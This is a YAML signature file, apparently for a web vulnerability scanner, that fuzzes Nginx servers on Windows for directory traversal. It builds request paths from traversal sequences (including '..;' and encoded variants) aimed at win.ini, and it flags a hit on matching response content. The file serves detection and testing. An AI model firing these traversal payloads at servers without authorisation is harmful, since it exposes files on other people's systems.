# info to search signature
id: nginx-traversal-path-02
type: fuzz
level: 2
info:
  name: Nginx Traversal Windows
  risk: High

variables:
  - prefix: |
      /
      \
      .
      @
      %0A
      %00
  - separate: |
      ..
      ..;
      ..%3B
  - file: |
      win.ini
      /win.ini
      c:/windows/win.ini
      /c:/windows/win.ini

payloads:
  - '{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'
  - '{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}/{{.separate}}{{.file}}'

requests:
  - generators:
      - Path("{{.payload}}", "*")
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "app support") && StringSearch("response", "[extensions]")
